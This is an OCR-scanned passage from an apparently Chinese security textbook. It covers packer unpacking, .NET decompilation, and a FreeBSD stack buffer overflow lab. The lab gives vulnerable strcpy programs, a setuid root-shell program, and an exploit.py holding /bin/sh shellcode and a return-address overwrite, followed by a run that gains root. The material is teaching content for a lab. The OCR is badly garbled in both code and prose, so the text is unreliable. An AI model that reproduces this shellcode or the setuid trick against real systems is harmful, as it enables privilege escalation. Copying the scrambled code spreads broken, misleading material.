1 E SHORT aspackpa. 00401045 
. 68 ØC214000 PUSH aspackpa. 6846216C 
. FF15 A4204000| CALL 站 各 PTR DS: [4629R4] 

83C4 84 ADD ESP,4 

ÜR P Ebo ,FFFFFFFF 


msver 166. 


stream 
fprintf 


printf 




















ARE FATT ft ADAE 
ar, ASIA GANTS 
最 后 希望 大 家 记 住 一 


释 并 指定 的 机 器 语言 指 令 ， 因 此 “即便 采取 了 难度 忆 


有 兴趣 的 话 ， 可 以 找 一 


B prod de 
点 ， 无 论 什么 软件 ， 其 本 质 都 是 处 理 器 可 以 解 
了 高 的 对 策 ， 





lss 


CIlsDebuggerPresent 


A I wjsd $3] 9| sd r[r|w[r|wIn|c]/]k]s]n]--Js] izitt]* 


ASCII "Spacked. jene €password»p" 


(format = "on debuggerBg" 


只 要 用 OllyDump 将 文件 导出 ， 





市 面 上 还 
些 强度 更 高 的 打包 


够 读 出 组 成 软件 的 所 有 机 咒语 言 指令 ， 就 一 定 能 够 找到 破解 的 方法 ”。 
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一 专栏 : 如 何 分 析 .NET 编写 的 应 用 程序 


NET 的 设计 和 Java 类 似 ， 在 编译 时 会 生成 一 种 叫 作 MSIL 
( Microsoft Intermediate Language ) 的 中 间 语 言 ， 并 在 运行 时 通过 
CLR ( Common Language Runtime ) 转换 成 处 理 器 能 够 解释 的 机 器 语 
言 。 因 此 ， 和 Java 一 样 ， 对 .NET 的 分 析 就 相当 于 对 MSIL 的 分 析 。 
相关 的 反 编译 器 可 以 使 用 .NET Reflector 8。 


















































A 



































e .NET Reflector 8 
http://www.red-gate.com/products/dotnet-development/ 


reflector/ 


有 对 用 NET 编写 的 EXE 文件 进行 反 编译 的 结果 


*- NET Reflector 8.1.0.35 - 13 days remaining 


i Fie Edit View Tools Help 
OOl h fl m P | w [NET 45 |v]| 2) 


Search Object Br (Ctrl-F) Oo By ag Form | 


} <CppImplementationDetails> I 
} <CrtImplementationDetails> 





























rivate class EnumThreadWindowsCallback 


// Fields 
private List¢HandleRef> ownedWindows; 


/ Methods 
internal Énum ThreadWindowsCallbac! 
© Derived Types internal boo! Callback (nr hid PAS faram); 
tor internal void Reset rs: 
pa internal void SetOwners HandleRef hRefOwner): 
g “Form 0: Void 


gi button! Click Object, EventArgs) : Void : : 
2$ Dispose Boolean) : Void pee class SecurityToolTip : Disposable 


gÊ InitializeComponentO : Void // Fields 
g@ button! : Button private bool first: 
private Form owner, 
a components : Container private string toolTipTex 
private Soo Netw, window; 


| // Methods 


internal Security ToolTip(Form owner): 

public void Dispose0: 

private void FormHandleCreated (object sender, EventAres e 

private he FormLocationChanged (object sender, event Ares ex 
lative Methods. T OT GetTOOLINFOO: 


























对 于 Java 和 NET 编写 的 应 用 程序 来 说 ， 逆 向 工程 的 重点 并 不 
是 用 i Aa 点 一 点 地 进行 分 析 ， 而 是 “如 何 还 原 出 最 
接近 原始 SRS”. Alt, SF Java 和 .NET 的 逆向 工程 所 需 
人 Noise 
页 便 一 提 ， 也 有 一 些 混 淆 技术 能 够 提高 反 编译 的 难度 ， 还 有 一 
些 工 具 能 够 让 生成 的 文件 在 反 编译 时 出 错 ， 这 是 软件 分 析 者 与 开发 
者 之 间 永 无 止境 的 攻防 战 。 
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本 章 中 ， 我 们 将 为 大 家 介绍 一 些 软件 的 漏洞 、 利 用 这 些 漏洞 进行 攻 


击 的 方法 


， 以 及 如 何 保护 软件 免 受 攻击 。 





大 家 经 常 听 说 “安全 技术 就 是 永 无 止境 的 猫 捉 老鼠 游戏 ”， 特 别 是 
漏洞 和 相应 的 攻击 方法 ,确实 是 一 场 没完 没 了 的 攻防 战 。 道 高 一 尺 麻 高 
一 丈 ， 尽 管 防御 方法 不 断 进 步 ， 但 新 的 攻击 方法 也 层出不穷 。 虽 然 在 这 


个 领域 中 
乐趣 所 在 












































追赶 最 新 的 潮流 非常 困难 ， 但 另 一 方面 ， 这 也 正 是 这 一 领域 的 


o 








之 前 我 们 都 是 在 Windows 环境 中 来 讲解 的 ， 从 这 里 开始 我 们 将 要 使 
用 FreeBSD 以 及 Ubuntu Linux 来 进行 讲解 了 。 其 中 ， 我 们 会 在 FreeBSD 
平台 上 演示 “利用 缓冲 区 溢出 执行 任意 代码 ”， 在 Ubuntu Linux 上 演示 


“防御 攻击 的 技术 ”。 























如 果 大 家 需要 虚拟 机 环境 ， 可 以 从 下 面 的 网 址 下 载 ， 这 两 个 镜像 都 
FY LAA VMWare Player 来 运行 。 


e VMWare Player 
http://www.vmware.com/products/player/ 

* FreeBSD-8.3 
http://07c00.com/tmp/FreeBSD 8.3 binbook.zip 

* Ubuntu-12.04 
http://07c00.com/tmp/Ubuntu-12.04 binbook.zip 











这 些 镜像 的 登录 用 户 名 和 密码 如 下 。 








e FreeBSD 


用 





户 名 : root ; 密码 : root 


HPZ: guest ; 密码 : guest 
e Ubuntu 

HPZ: root ; 密码 : guest 

HPZ: guest ; 密码 : guest 





下 面 我 们 就 开始 吧 ! 
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3.1 利用 缓冲 区 溢出 来 执行 任意 代码 


3.1.1 引发 缓冲 区 溢出 的 示例 程序 


在 软件 的 安全 漏洞 中 ， 绥 冲 区 游 出 〈buffer overflow ) 是 最 有 名 的 漏 
洞 之 一 。 简 单 来 说 ,缓冲 区 洪 出 就 是 “输入 的 数据 超出 了 程序 规定 的 内 
存 范 围 ， 数 据 溢出 导致 程序 发 生 异 常 ”。 

举 个 例子 ， 大 家 想 一 想 下 面 的 程序 运行 后 会 有 怎样 的 结果 ( 源 代码 
JL chap03\FreeBSD 8.3 x86 )。 


























Y sample1.c 


#include <string.h> 


int main(int argc, char *argv[]) 
{ 
char buff [64]; 
strepy (burt, argv[i); 
return 0; 


4i 
3ll 
= 


V i511 


$ gcc -Wall samplel.c -o samplel 
$ ./samplel ^python -c 'print "A'*70'^ 
Segmentation fault (core dumped) 








NER c 这 个 程序 就 有 缓冲 区 溢出 漏洞 。 
个 程序 为 buff 数组 分 配 了 一 块 64 字 节 的 内 存 空 间 ， 但 传递 给 程 
序 的 参数 argv[1] 是 由 用 户 任意 输入 的 ， 因 此 参数 的 长 度 很 有 可 能 会 超 
过 64 字 节 。 
strcpy 函数 用 于 复制 字符 串 ， 一 直 复 制 到 字符 串 的 边界 ， 即 过 到 
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“ 0” 为止 。 因 此 ， 当 用 户 故 意向 程序 传递 一 个 超过 64 字 节 的 字符 串 时 ， 
就 会 在 main 函数 中 引发 缓冲 区 洪 出 。 

这 里 的 重点 在 于 ,“ 当 输入 的 数据 超过 64 字 节 时 ， 程 序 的 行为 将 变 
得 不 可 预测 ”， 这 就 成 为 了 一 个 漏洞 。 











3.1.2 ”让 普通 用 户 用 管理 员 权 限 运 行程 序 


Linux 和 FreeBSD 中 有 一 个 用 来 修改 密码 的 命令 “passwd”。 密 码 
一 般 保存 在 /etc/master.passwd、/etc/passwd 和 /etc/shadow 等 中 ， 没 有 
root 权限 的 用 户 是 无 法 修改 这 些 文件 的 。 

然而 ， 如 果 只 有 root 才能 修改 密码 ， 使 用 起 来 就 会 很 不 方便 ， 
我 们 需要 一 个 机 制 让 普通 用 户 也 能 够 临时 借用 管理 员 权 限 ， 这 个 机 制 就 
是 setuid。setuid 的 功能 是 让 用 户 使 用 程序 的 所 有 者 权限 来 运行 程序 。 

我 们 来 看 下 面 这 个 例子 。 






































| 
ul 











于 是 


















































di 
3l 
= 


V 运行 5 


$ ls -1 /etc/passwd 
-rw-r--r-- 1 root root 1020 Nov 8 11:54 /etc/passwd 





/etc/passwd 文件 不 允许 除 root 以 外 的 用 户 进行 写 人 ,但 passwd 命 
令 可 以 (通过 setuid 机 制 ) 临时 以 root 权限 来 运行 。 


-i 
ol 
m 


V 运行 5 
$ 1s -1 /usr/bin/passwd 
-r-s--x--x 1 root root 12292 Feb 22 2001 /usr/bin/passwd* 
请 大 家 注意 权限 部 分 的 “r-s”"， 这 里 的 “s” 表 示 该 程序 已 启用 
setuid. 
下 面 的 sample2.c 是 一 个 很 简单 的 程序 ， 它 会 调用 execve 函数 来 运 
47 /bin/sh. 
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Y sample2.c 


#include <unistd.h> 
#include <sys/types.h> 


int main(int argc, char *argv[]) 


{ 


char *data[2]; 
char *exe = "/bin/sh"; 


data[0] = exe; 
data[1] = NULL; 


setuid (0) ; 
execve(data[0], data, NULL); 
return 0; 


我 们 用 root 权限 编译 该 程序 ， 然 后 设置 setuid。 











v 运行 示例 


$ su 

Password: 输入 root 密 码 

4 gcc -Wall sample2.c -o sample2 

# chmod 4755 sample2 

# 1s -1 sample2 

-rws--x--x 1 root guest 4832 Sep 3 07:47 sample2 


这 时 我 们 发 现 sample2 的 权限 变 成 了 “rws”， 这 表示 已 经 启用 了 
setuid, 

当 我 们 再 次 以 普通 用 户 权限 运行 这 个 程序 时 ， 会 用 root 权限 调用 
execve 函数 。 这 样 一 来 ,普通 用 户 就 会 以 root 权限 启动 /bin/sh®, 这 十 分 
危险 。 





















































(D /bin/sh € UNIX 类 系统 的 外 党 程序 ， 如 果 用 root 权限 启动 了 它 ， 就 相当 于 可 以 用 
root 权限 对 系统 进行 任何 操作 。 译 者 注 
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v 运行 示例 


$ whoami 
guest 

$ ./sample2 
4 whoami 
root 





当然 ， 一 般 情况 下 谁 也 不 会 为 这 样 的 程序 设置 setuid。 不 过 ， 像 
samplel 这 样 的 程序 一 旦 以 所 有 者 权限 运行 ， 就 会 出 现 缓冲 区 溢出 的 漏 
洞 ， 被 攻击 者 夺取 权限 。 























3.1.3 ”权限 是 如 何 被 夺取 的 

下 面 我 们 来 看 一 个 夺取 权限 的 例子 。 

我 们 准备 一 个 有 漏洞 的 程序 sample3.c， 以 及 对 其 进行 攻击 夺取 权限 
的 exploit.py。 两 个 程序 的 代码 我 们 稍 后 再 进行 解释 ， 请 大 家 先 运行 一 下 
看 看 。 




















Y sample3.c 


#include <stdio.h> 
#include <string.h> 


unsigned long get sp(void) 


asm  ("movl $esp, $eax"); 


int cpy(char *str) 


char buff[64]; 

printf("Ox$081x", get sp() + 0x10); 
getchar(); 

Strcpy(buff, str); 


return 0; 
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int main(int argc, char *argv[]) 


{ 
cpy (argv[1]); 
return 0; 
) 
Y exploit.py 


#! /usr/local/bin/python 


import sys 


from struct import * 


if len(sys.argv) != 2: 
addr = 0x41414141 
elser 
addr s intíisys.argvit], 26) 


+= "\x31\xc0\x50\x89\xe0\x83\xe8\x10" # 8 
+= "\x50\x89\xe3\x31\xc0\x50\x68\x2£" #16 
+= "\x2£\x73\x68\x68\x2£\x62\x69\x6e" #24 
"\x89\xe2\x31\xc0\x50\x53\x52\x50" #32 
+= "\xb0\x3b\xcd\x80\x90\x90\x90\x90" #40 
+= "\x90\x90\x90\x90\x90\x90\x90\x90" #48 
+= "\x90\x90\x90\x90\x90\x90\x90\x90" #56 
+= "\x90\x90\x90\x90\x90\x90\x90\x90" #64 
+= "\x90\x90\x90\x90"+pack('<L',addr) #72 


nhnnnn nanny n 
+ 
I 





sys.stdout.write(s) 


SS 

Password: 

# gcc -Wall sample3.c -o sample3 

Samplesec:PmEtunctionMUgete spi 

sample3.c:9: warning: control reaches end of non-void function 
# chmod 4755 sample3 

4 exit 

$ ./sample3 ‘python exploit.py^ 

Oxbfbfebe8 
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Segmentation fault 


$ ./sample3 "^python exploit.py bfbfebe8"" 


Oxbfbfebe8 
4 whoami 
root 


sample3.c 的 cpy 函数 会 将 输入 的 字符 串 原 原本 本 地 复制 到 一 块 只 有 
64 字 节 的 内 存 空间 中 。 由 于 字符 串 是 由 用 户 任意 输入 的 ， 因 此 如 果 将 
exploit.py 的 输出 结果 输入 给 sample3.c， 我 们 就 成 功 地 以 所 有 者 (root) 





权限 运行 了 /bin/sh。 














3.1.4” 栈 是 如 何 使 用 内 存 空间 的 
上 面 的 攻击 为 什么 能 成 功 呢 ? 要 理解 这 一 原理 ， 我 们 得 先 从 栈 是 如 


何 使 用 内 存 空间 的 开始 讲 








起 。 











栈 是 一 种 内 存 的 使 
的 盘子 "”。 栈 并 不 是 一 种 





| 方式 ， 经 常会 被 比喻 成 “ 直 简 ”或 者 “ 堆 起 来 
物理 上 真实 存在 的 东西 ， 它 也 是 普通 的 内 存 空 





间 ， 只 是 “ 像 直 简 或 堆 起 来 的 盘子 这 样 来 使 用 ”而 已 。 


Plt PED SR 


要 理解 栈 的 工作 原理 ， 我 们 可 以 使 用 push 、pop 指令 并 看 一 下 结果 。 


























bffffoe8 bffff6ec bffff6fO bffff6f4 bffff6f8 bffff6fc bffff700 














在 程序 开始 运行 时 ， 
为 bffff6fc ( ebp=esp )。 


先 要 确定 栈 的 起 点 ( 基地 址 )。 假设 栈 的 起 点 





然后 ， 我 们 发 现 bffff6fc 中 已 经 存 有 一 个 0x01。 请 大 家 注意 一 下 下 


图 中 的 esp. ebp 和 bffffg 


fc 地 址 中 的 值 。 
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| 











esp = bffff6fc 
ebp = bffff6fc 


bffff6e8 bfffféec bffff6fO bffff6f4 bffff6f8  bffffefc bffff700 

















bffff6fc 的 值 为 0x01。 在 这 个 状态 下 ， 如 果 我 们 执行 push 指令 会 如 
何 呢 ?” 例 如 ， 我 们 可 以 执行 push 0x02。 





esp = bffff6f8 ” 栈 指针 递减 
ebp = bffff6fc ”其 址 指针 不 变 




















00000002|00000001 











bffff6e8 bffff6ec bffff6f0 bffff6f4 bffff6f8 bffff6fc bffff700 











最 早 的 地 址 中 还 是 0x01， 而 0x02 被 保存 到 相 邻 的 地 址 中 了 。 

正如 上 面 这 样 ， 栈 是 从 后 往 前 (向 地 址 递减 方向 ) 增长 的 。 若 我 们 
不 断 执行 push 指令 ，push 的 值 就 会 不 断 被 存 人 更 靠 前 的 内 存 地 址 中 。 
esp 寄存 器 中 则 保存 了 最 新 入 栈 的 内 存 地 址 。 




















esp = bffff6ec ” 栈 指针 递减 
ebp = bffff6fc ”其 址 指针 不 变 




















00000005 | 00000004 |00000003 | 00000002 | 00000001 











bffffGe8  bffffGec bffff6f0 bffff6f4 bffff6f8 bffff6fc bffff700 
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以 上 为 将 0x02~0x05 的 值 按 顺序 push 时 栈 的 状态 。 

















区 从 栈 中 取出 数据 
下 面 我 们 来 看 一 下 从 栈 中 取出 数据 时 会 发 生 怎样 的 情况 。 
从 栈 中 取出 数据 时 ， 我 们 会 使 用 pop 指令 ，pop 指令 会 从 栈 的 最 低 

















位 地 址 取出 一 条 数据 。 
栈 的 最 低位 地 址 也 叫 作 这 个 栈 的 “ 栈 顶 ”( esp )。 





esp = bffff6f0” 栈 指针 递增 
ebp = bffff6fc 








00000004 | 00000003 | 00000002 | 00000001 





bffffGe8  bffffGec bffff6fO bffff6f4  bffffGf8  bffffGfc bffff700 




















下 面 我 们 来 执行 pop eax. 

我 们 刚刚 最 后 push 的 数据 为 0x05， 这 条 数据 会 被 首先 pop 出 来 。 
因此 ，eax 里 面 会 被 存 人 0x05。 
再 执行 一 次 pop， 我 们 就 取出 了 0x04。 很 简单 吧 。 
这 时 ，esp 的 值 也 会 发 生 相应 的 变化 ， 先 从 bffff6ec 变 成 bffff6f0， 
然后 再 变 成 bffff6f4。 






































esp = bffff6f4 ”执行 两 次 pop 之 后 的 值 
ebp = bffff6fc 








00000003 | 00000002 | 00000001 








bffffGe8  bffffGec bffff6fO bffff6f4 bffff6f8 bffff6fc bffff700 
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大 家 不 用 想 得 大 难 ， 只 要 记 住 “这 种 用 法 的 内 存 空间 叫 作 栈 ” 就 可 


以 了 。 





顺便 一 提 ， 在 信息 工程 中 ， 栈 叫 作 LIFO (Last In, First Out )， 即 后 





3.1.5 攻击 者 如 何 执行 任意 代码 
我 们 在 函数 调用 的 结构 中 会 用 到 栈 的 概念 。 














Y sample4.c 


AOL vetare (alee oe, ls Wy, heim je) 


{ 
int a; 
char buff[8]; 


} 


int main (void) 


{ 
mime, 2, SNA 
return 0; 


$ gcc -S sample4.c 








请 大 家 编写 sample4.c， 并 加 上 -S 选项 进行 编译 ， 
sample4.s 文件 。 这 是 sample4.c 的 汇编 语言 代码 。 

func 函数 有 三 个 参数 ， 分 别传 递 了 1 、2 、3 三 个 数字 
内 部 没有 进行 任何 处 理 。 














V sample4.s 


.file "sample4.c" 
dex 
.p2align 4,,15 


进 先 出 。 而 像 队 列 这 种 先进 先 出 的 则 叫 作 FIFO ( First In, First Out )。 


然后 会 生成 


， 而 func 函数 
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.globl func 
.type func, @function 
fune: 
pushl %ebp 保存 ebp 
movl $esp, %ebp 将 ebp 移动 到 esp 的 位 置 
subl $16, %esp 
leave 恢复 ebp 和 esp 
ret 跳 转 到 调用 该 函数 的 位 置 
.Size tunc -fune 
.p2align 4,,15 
.globl main 
.type main, Gfunction 
main: 
lea 4(%esp), $ecx 
and $-16, %esp 
pushl -4 (Secx) 
pushl Sebp 
mov sesp, $ebp 
pushl SOCK 
sub $12, %esp 
mov $3, 8(%esp) 第 3 参数 
mov $2, 4(%esp) 第 2 参数 
mov $1, (%esp) 第 1 参数 
cal func iW Füfunceg Zit 
mov. $0, $eax 
add $12, %esp 
pop SOCK 
pop $ebp 
lea -4(%ecx), %esp 
ret 
.Size main, .-main 
.ident  "GCC: (GNU) 


在 C 语言 中 传递 的 int 型 参数 ， 在 汇编 
放 到 栈 中 。 尽 管 这 里 的 入 栈 操作 没有 使 用 push 指令 ， 但 功能 是 相同 的 。 





V 函数 调用 时 入 栈 的 方法 1 


push $3 
push $2 
push $1 


4.2.2 20070831 prerelease [FreeBSD]" 


7H. 
TFT 百 


// esp-=4， 将 3 送 入 esp+0 
// esp-=4， 将 2 送 入 esp+0 
// esp-=4， 将 1 送 入 esp+0 


中 需要 在 call func 之 前 存 
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V 函数 调用 时 入 栈 的 方法 2 


subl $12, %esp // esp-=12 

movl $3, 8(%esp) // 将 3 送 入 esp+8 
movl $2, 4($esp) // 将 2 送 入 esp+4 
movl $l1，(%esp)  // 将 1 送 入 esp+0 





将 参数 入 栈 后 ， 通 过 call 指令 调用 子 程序 。 

和 jmp 不 同 ，call 必须 记 住 调用 时 当前 指令 的 地 址 ， 因 此 在 跳 转 到 
子 程序 的 地 址 之 前 ， 需 要 先 将 返回 地 址 (ret addr) push 到 栈 中 。 

当 调 用 func 函数 时 ， 在 跳 转 到 函数 起 始 地 址 的 瞬间 ， 栈 的 情形 如 下 
图 所 示 。 






































ret_addr 





( 内 存 低 位 ) ( 内 存 高 位 ) 











然后 ， 程 序 又 执行 了 push ebp。 
接 下 来 ，esp 继续 递减 ， 为 函数 内 部 的 局 部 变量 分 配 内 存 空间 。 












































a &buff | %ebp | ret addr $1 $2 $3 
( 内 存 低位 ) 内 存 高 位 ) 
这 时 ， 如 果 数 据 溢出 ， 超 过 了 原本 分 配给 数组 buff 的 内 存 空间 ， 会 





发 生 什么 事 呢 ? 
数组 buff 后 面 的 %ebp、ret_addr 以 及 传递 给 func 函数 的 参数 都 会 
被 洪 出 的 数据 履 盖 掉 。 
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这 里 的 问题 在 于 ， 一 旦 %ebp fll ret addr 被 覆盖 掉 ， 将 会 引发 严重 
的 后 果 。ret_addr 存放 的 是 函数 逻辑 结束 后 返回 main 函数 的 目标 地 址 。 
也 就 是 说 ， 如 果 履 盖 了 ret_addr， 攻 击 者 就 可 以 让 程序 跳 转 到 任意 地 址 。 
如 果 攻 击 者 事先 准备 一 段 代 码 ， 然 后 让 程序 跳 转 到 这 段 代码 ， 也 就 相当 
于 成 功 攻 击 了 “可 执行 任意 代码 的 漏洞 ”。 


















































3.1.6 用 gdb 查看 程序 运行 时 的 情况 


下面 我 们 来 实际 见证 一 下 返回 地 址 是 如 何 被 改写 的 。 

为 此 ， 我 们 需要 使 用 一 个 叫 作 gdb 的 工具 。gdb 是 在 UNIX 类 操作 
系统 中 常用 的 调试 器 ， 不 过 它 是 一 个 命令 行 工 具 ， 因 此 需要 记 住 一 些 命 
令 才能 够 使 用 。 大 家 不 必 熟 练 掌握 gdb 的 用 法 ， 只 要 先 记 住 一 些 常用 的 
命令 就 好 。 



















































































命令 说 明 
r 运行 程序 ( 可 以 直接 带 命 令 行 参数 ) 
b 设置 断 点 ( 加 星 号 可 传递 地 址 ) 
c 在 断 点 处 中 断后 ， 继 续 运行 程序 
xL RS li | 对 指定 数量 的 指令 进行 反 汇编 
disas 同上 





xl 数字 ]x | 显示 指定 长 度 的 数据 

X 可 用 地 址 或 寄存 器 作为 参数 
X 传递 寄存 器 时 要 加 $ 

X/[ 数字 ]s | 以 字符 串 形式 显示 任意 长 度 的 数据 

































































ir 显示 寄存 器 的 值 
set 向 寄存 器 或 内 存 写 入 值 
q 结束 调试 


























X 当 处 于 调试 中 时 ， 程 序 会 询问 是 否 要 结束 调试 ， 这 时 输入 y 可 结束 调试 

















用 gdb 对 程序 进行 调试 有 下 面 两 种 方法 。 


V 将 程序 的 路 径 作为 参数 传递 给 gdb 


$ gdb test00 
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V 将 gdb 挂 载 到 某 个 进程 上 


(gdb) attach 1111 
Attaching to process 1111 





下 1 














i 我 们 通过 传递 参数 的 方式 用 gdb 来 启动 sample3。 


v 运行 示例 


$ gdb sample3 

GNU gdb 6.1.1 [FreeBSD] 

(gdb) disas cpy 反 汇 编 cpy 

Dump of assembler code for function cpy: 


0x08048540 <cpy+0>: push sebp 
0x08048541 <cpy+1>: mov sesp, sebp 
0x08048543 <cpy+3>: sub $0x48,%esp 
省 略 


0x080485b0 <cpy+112>: mov $eax, (Sesp) 
0x080485b3 <cpy+115>: call 0x80483ec <_init+116> 
0x080485b8 <cpy+120>: mov $0x0,%eax 
0x080485bd <cpy+125>: leave 

0x080485be <cpy+126>: ret 返回 到 调用 该 函数 的 位 置 
0x080485bf <cpy+127>: nop 

End of assembler dump. 

(gdb) b *0x080485be ”调用 返回 前 设置 断 点 
Breakpoint 1 at 0x80485be 

(gdb) b cpy 在 cpy 开 头 设置 断 点 
Breakpoint 2 at 0x8048546 

(gdb) r "V^python -c 'print "A'*80'V^" 运行 
Starting program: 











/usr/home/guest/sample3 "^python -c 'print "A'*80'^" 

(no debugging symbols found)... 

(no debugging symbols found)... 

Breakpoint 2, 0x08048546 in cpy () 

(gdb) x/8x Sebp 确认 %ebp、ret_addr 和 参数 

Oxbfbfebf8: 0xbfbfec08 0x080485el 0xbfbfedb0  Oxbfbfec20 
Oxbfbfec08: Oxbfbfec38 0x080484b7  0x00000000 0x00000000 
(gdb) x/1s OxbfbfedbO 

Oxbfbfedb0: 'A' «repeats 80 times» 

(gdb) c 继续 运行 

Continuing. 

Oxbfbfebb8 
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Breakpoint 1, 0x080485be in cpy () 

(gdb) x/8x $esp ret addri Á 5 290x41414141 

Oxbfbfebfc: 0x41414141 0x41414141 0x41414141 0xbfbfec00 
OxbfbfecOc: 0x080484b7 0x00000000 0x00000000 Oxbfbfec38 
(gdb) si 

0x41414141 in ?? () 


这 里 的 要 点 在 于 以 下 几 点 。 


* Oxbfbfebf8 的 值 为 %ebp 
e Oxbfbfebfc 的 值 为 ret_addr 
。 后 面 是 传递 给 函数 的 参数 


sample3 的 cpy 函数 只 有 一 个 str 参数 ， 因 此 它 的 位 置 紧 挨 着 ret_ 
addr。 











| 


可 能 被 覆盖 


( 内 存 低 位 ) 内 存 高 位 ) 

















在 这 里 ， 由 于 cpy 中 定义 的 buff 变量 溢出 ， 因 此 后 面 的 内 存 空 间 都 
会 被 覆盖 掉 。 

Oxbfbfebfc 的 值 被 改写 为 0x41414141， 因 此 当 程 序 运行 到 0x080485be 
的 ret 指令 时 ， 就 会 跳 转 到 0x41414141 这 个 地 址 ， 导 致 Segmentation 
fault. 
如 果 我 们 在 buff 中 植 入 一些 机 器 语言 指令 ， 然 后 将 返回 地 址 改 为 这 
些 指令 的 地 址 ， 这 样 就 可 以 让 计算 机 执行 任意 代码 了 。 























I 
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3.1.7 ”攻击 代码 示例 


那么 ， 攻 击 者 会 让 计算 机 执行 什么 样 的 代码 呢 ? 让 我 们 来 看 一 个 例子 。 

攻击 者 要 执行 的 代码 叫 作 shellcode。 因 为 一 般 来 说 ， 只 要 启动 了 / 
bin/sh， 攻 击 者 就 能 够 完全 控制 计算 机 ， 因 此 shellcode 指 的 就 是 一 段 非 
常 短 小 的 机 器 语言 代码 ， 它 的 功能 就 是 启动 /bin/sh。 

下 面 就 是 一 段 能 够 启动 /bin/sh 的 程序 。 





























V sample5.c 


#include <unistd.h> 


int main (void) 
{ 
char *data[2]; 
char sh[] = "/bin/sh"; 


data [0] 
data [1] 


= sh; 

= NULL; 
execve(sh, data, NULL); 
return 0; 





我 们 先 声 明 一 个 char 型 的 指针 数组 ， 然 后 在 data[0] 中 存 人 /bin/sh 
字符 串 的 指针 ， 在 data[1] 中 存 人 NULL。 由 于 /bin/sh 不 需要 参数 ， 
此 data 数组 只 需要 两 个 元 素 就 够 了 。 

execve 的 参数 为 下 列 3 个 。 























* /bin/sh 字符 串 的 指针 
。 包含 传递 给 程序 的 参数 在 内 的 数组 的 地 址 


。 环境 变量 





这 里 环境 变量 不 是 必需 的 ， 因 此 我 们 将 其 设 为 NULL。 
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/bin/sh 不 需要 参数 ， 因 此 data 中 只 存放 了 /bin/sh 字符 串 的 指针 。 


v 运行 示例 


$ su 

Password: 

# gcc -Wall -static sample5.c -o sample5 
# chmod 4755 sample5 

# exit 

exit 

$ ./sample5 

# whoami 

root 





由 于 samples 是 采用 静态 链接 编译 的 ， 因 此 execve 本 身 也 位 于 可 执 
行文 件 内 部 。 用 gdb 对 execve 进行 反 汇编 ， 我 们 可 以 发 现 其 中 调用 了 
int$0x80。 




















v 运行 示例 
$ gdb sample5 
GNU gdb 6.1.1 [FreeBSD] 


(gdb) disas execve 
Dump of assembler code for function execve: 





0x080484f4 <execve+0>: mov $0x3b, eax 
0x080484f9 <execve+5>: int $0x80 系统 调用 
0x080484fb <execve+7>: jb 0x80484ec <_set_tp+12> 


0x080484fd <execve+9>: ret 
End of assembler dump. 
(gdb) 
int $0x80 是 一 个 系统 调用 。 
我 们 先 看 一 下 前 面 的 mov $0x3b,%eax 指令 ， 它 的 功能 是 将 0x3b 存 
A eax 寄存 器 。 实 际 上 ， 这 个 值 是 execve 系统 调用 的 编号 ， 系 统 内 核 会 
根据 这 个 编号 来 识别 不 同 的 系统 调用 。 
背 此 机 会 ， 我 们 不 妨 来 看 一 下 其 他 一 些 系统 调用 的 编号 。 
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V /usr/include/sys/syscall.h 


/* 
* System call numbers. 


* 
* DO NOT EDIT-- this file is automatically generated. 
ay 





#define SYS syscall 0 
#define SYS exit 1 
#define SYS fork 2 
#define SYS read 3 
#define SYS write 4 
#define SYS open 5 
省 略 

#define SYS ioctl 54 
#define SYS reboot 55 
#define SYS_revoke 56 
#define SYS_symlink 57 
#define SYS readlink 58 
#define SYS execve 59 59 -> Ox3b 
#define SYS umask 60 
#define SYS chroot 61 








系统 调用 的 编号 如 下 。 








e 1: exit 
e 2: fork 
e 3: read 
e 4: write 





以 此 类 推 ， 我 们 发 现 59 对 应 的 是 execve, Tf 59 转换 为 十 六 进 制 就 
是 Ox3b Toa 

顺便 一 提 ，,， 在 Linux 系统 中 ， 系 统 调 用 的 编号 定义 位 于 下 面 的 文 
件 中 。 
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行 攻击 





V /usr/src/linux/include/asm/unistd.h 


#ifndef ASM 1386 UNISTD H 





#define ASM 1386 UNISTD H 





/* 


* This file contains the system call numbers. 


up 


#define — NR exit 
#define NR fork 
#define ^ NR read 
省 略 


#define __NR_execve 


I1 


在 Linux tF, execve 的 编号 为 11。 





由 于 系统 调用 的 编号 在 各 个 环境 中 是 不 同 的 ， 因 此 在 1 





BE shellcode 


的 时 候 需 要 特别 注意 。 换 句 话说， 每 一 种 操作 系统 上 的 shellcode 都 各 不 





相同 ， 因 此 需要 为 每 种 环境 都 





会 介绍 Metasploit 工具 ， 


3.1.8 生成 可 用 作 shellcode 的 机 器 语言 

















央 作 相应 的 shellcode ( 当然 ， 
通过 它 可 以 自动 生成 shellcode )。 








代码 


第 5 章 我 们 


下 面 我 就 根据 samples 来 生成 可 用 作 shellcode 的 机 器 语言 代码 。 


v 运行 示例 
$ gdb sample5 


GNU gdb 6.1.1 [FreeBSD] 


(gdb) disas main 


Dump of assembler code for function main: 


0x08048210 <main+0>: 
0x08048214 «main44»: 
0x08048217 <main+7>: 


0x0804821a <main+10>: 
0x0804821b «main411»: 
0x0804821d <main+13>: 
0x0804821e <main+14>: 
0x08048221 <main+17>: 


lea 
and 
pushl 
push 
mov 
push 
sub 


mov 


0x4 (Sesp) ,Secx 
SOxfff£ffffO, vesp 
Oxfffffffc (%ecx) 
sebp 

sesp, sebp 

S$ecx 

$0x24,%esp 
0x806cdd8, $eax 


0x08048226 
0x0804822c 
0x0804822f 
0x08048232 
0x08048235 
0x08048238 
0x0804823f 
0x08048247 
0x0804824a 
0x0804824e 
0x08048251 
0x08048254 
0x08048259 
0x0804825e 
0x08048261 
0x08048262 
0x08048263 
0x08048266 


<main+22>: 
<main+28>: 
<main+31>: 
<main+34>: 
<main+37>: 
<maint+40>: 
<maint+47>: 
<main+55>: 
<main+58>: 
<main+62>: 
<main+65>: 
<main+68>: 
<main+73>: 
<main+78>: 
<main+81>: 
<main+82>: 
<main+83>: 


<main+86>: 


(gdb) b *0x08048254 
Breakpoint 1 at 0x8048254 


(gdb) r 























3.1 利用 缓冲 区 溢出 来 执行 任意 代码 
mov 0x806cddc, $edx 
mov Seax, Oxffffffec ($ebp) 
mov Sedx, Oxfffffff0 ($ebp) 
lea Oxffffffec(%ebp) , eax 
mov $eax,0xfffffff4($ebp) 
movil $0x0,0xfffffff8(Stebp) 
movl  $0x0,0x8(£esp) 第 3 参数 
lea Oxfffffff4(S$ebp),$*eax 
mov $eax, 0x4 (Sesp) 第 2 参数 
lea Oxffffffec(%ebp) , eax 
mov $eax, (Sesp) 第 1 参数 
call 0x80484f4 <execve> 调用 execve 
mov $0x0,£teax 
add $0x24, %esp 
